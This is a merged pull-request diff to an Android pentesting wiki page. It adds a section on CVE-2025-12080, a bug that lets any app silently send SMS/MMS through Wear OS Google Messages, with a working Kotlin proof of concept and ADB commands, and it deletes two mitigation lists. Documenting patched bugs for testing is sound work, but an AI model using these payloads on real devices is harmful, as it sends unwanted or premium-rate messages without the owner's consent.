Merge pull request #1527 from HackTricks-wiki/update_CVE-2025-12080___Intent_Abuse_in_Google_Messages_f_20251027_124020

CVE-2025-12080 — Intent Abuse in Google Messages for Wear OS...

Author: carlospolop

src/mobile-pentesting/android-app-pentesting/intent-injection.md

@@ -48,10 +48,6 @@ What to look for in decompiled code:
 - Calls to `getSettings().setJavaScriptEnabled(true)` before the last host/path allowlist check.
 - A pipeline like: parse → partial validate → configure WebView → final verify → loadUrl.
 
-Mitigations
-- Canonicalize once and validate strictly; fail closed.
-- Only enable JavaScript after all checks pass and just before loading trusted content.
-- Avoid exposing bridges to untrusted origins.
 
 ## Unity Runtime: Intent-to-CLI extras → pre-init native library injection (RCE)
 
@@ -110,6 +106,48 @@ namespace: [name="clns-...", ... permitted_paths="/data:/mnt/expand:/data/data/c
 Bypass strategy: target apps that cache attacker-controlled bytes under their private storage (e.g., HTTP caches). Because permitted paths include `/data` and the app’s private dir, pointing `-xrsdk-pre-init-library` at an absolute path inside the app’s cache can satisfy linker constraints and yield code execution. This mirrors prior cache-to-ELF RCE patterns experienced in other Android apps.
 
 
+## Confused‑Deputy: Silent SMS/MMS via ACTION_SENDTO (Wear OS Google Messages)
+
+Some default messaging apps incorrectly auto‑execute implicit messaging intents, turning them into a confused‑deputy primitive: any unprivileged app can trigger `Intent.ACTION_SENDTO` with `sms:`, `smsto:`, `mms:`, or `mmsto:` and cause an immediate send without a confirmation UI and without the `SEND_SMS` permission.
+
+Key points
+- Trigger: implicit `ACTION_SENDTO` + messaging URI scheme.
+- Data: set recipient in the URI, message text in the `"sms_body"` extra.
+- Permissions: none (no `SEND_SMS`), relies on the default SMS/MMS handler.
+- Observed: Google Messages for Wear OS (patched May 2025). Other handlers should be assessed similarly.
+
+Minimal payload (Kotlin)
+```kotlin
+val intent = Intent(Intent.ACTION_SENDTO).apply {
+    data = Uri.parse("smsto:+11234567890") // or sms:, mms:, mmsto:
+    putExtra("sms_body", "Hi from PoC")
+    // From a non-Activity context add NEW_TASK
+    addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
+}
+startActivity(intent)
+```
+
+ADB PoC (no special permissions)
+```bash
+# SMS/SMS-to
+adb shell am start -a android.intent.action.SENDTO -d "smsto:+11234567890" --es sms_body "hello"
+adb shell am start -a android.intent.action.SENDTO -d "sms:+11234567890"   --es sms_body "hello"
+
+# MMS/MMS-to (handler-dependent behaviour)
+adb shell am start -a android.intent.action.SENDTO -d "mmsto:+11234567890" --es sms_body "hello"
+adb shell am start -a android.intent.action.SENDTO -d "mms:+11234567890"   --es sms_body "hello"
+```
+
+Attack surface expansion (Wear OS)
+- Any component capable of launching activities can fire the same payload: Activities, foreground Services (with `FLAG_ACTIVITY_NEW_TASK`), Tiles, Complications.
+- If the default handler auto‑sends, abuse can be one‑tap or fully silent from background contexts depending on OEM policies.
+
+Pentest checklist
+- Resolve `ACTION_SENDTO` on target to identify the default handler; verify whether it shows a compose UI or silently sends.
+- Exercise all four schemes (`sms:`, `smsto:`, `mms:`, `mmsto:`) and extras (`sms_body`, optionally `subject` for MMS) to check behaviour differences.
+- Consider charged destinations/premium‑rate numbers when testing on real devices.
+
+
 ## Other classic Intent injection primitives
 
 - startActivity/sendBroadcast using attacker-supplied `Intent` extras that are later re-parsed (`Intent.parseUri(...)`) and executed.
@@ -167,7 +205,9 @@ Full-pipeline automation (interactive executor)
 python apk-components-inspector.py app.apk | tee adbcommands.txt
 python run_adb_commands.py
 ```
-Helper script (merges continued lines, executes only lines starting with `adb`):
+<details>
+<summary>Helper script to parse and execute adb commands</summary>
+
 ```python
 import subprocess
 
@@ -203,6 +243,9 @@ for i, cmd in enumerate(parse_adb_commands('adbcommands.txt'), 1):
     except subprocess.CalledProcessError as e:
         print(f"Command failed with error:\n{e.stderr}")
 ```
+
+</details>
+
 Run on-device: the inspector is Python-based and works in Termux or rooted phones where `apktool`/`androguard` are available.
 
 ---
@@ -250,11 +293,6 @@ Real-world examples (impact varies):
 - CVE-2021-4438 (React Native SMS User Consent).
 - CVE-2020-14116 (Xiaomi Mi Browser).
 
-Mitigations (developer checklist)
-- Do not forward incoming Intents directly; sanitize and re-construct allowed fields.
-- Restrict exposure with `android:exported="false"` unless necessary. Protect exported components with permissions and signatures.
-- Verify caller identity (`getCallingPackage()`/`getCallingActivity()`), and enforce explicit Intents for intra-app navigation.
-- Validate both `action` and `data` (scheme/host/path) before use; avoid `Intent.parseUri` on untrusted input.
 
 ---
 
@@ -280,5 +318,9 @@ Mitigations (developer checklist)
 - [Unity docs – Android custom activity command-line](https://docs.unity3d.com/6000.0/Documentation/Manual/android-custom-activity-command-line.html)
 - [Unity Security Sept-2025-01 advisory](https://unity.com/security/sept-2025-01)
 - [HEXACON talk – Messenger one-click cache-based RCE pattern (slides)](https://www.hexacon.fr/slides/Calvanno-Defense_through_Offense_Building_a_1-click_Exploit_Targeting_Messenger_for_Android.pdf)
+- [CVE-2025-12080 — Intent Abuse in Google Messages for Wear OS](https://towerofhanoi.it/writeups/cve-2025-12080/)
+- [PoC repo – io-no/CVE-2025-12080](https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-12080)
+- [Android docs – Intents and Intent Filters](https://developer.android.com/guide/components/intents-filters)
 
-{{#include ../../banners/hacktricks-training.md}}
+
+{{#include ../../banners/hacktricks-training.md}}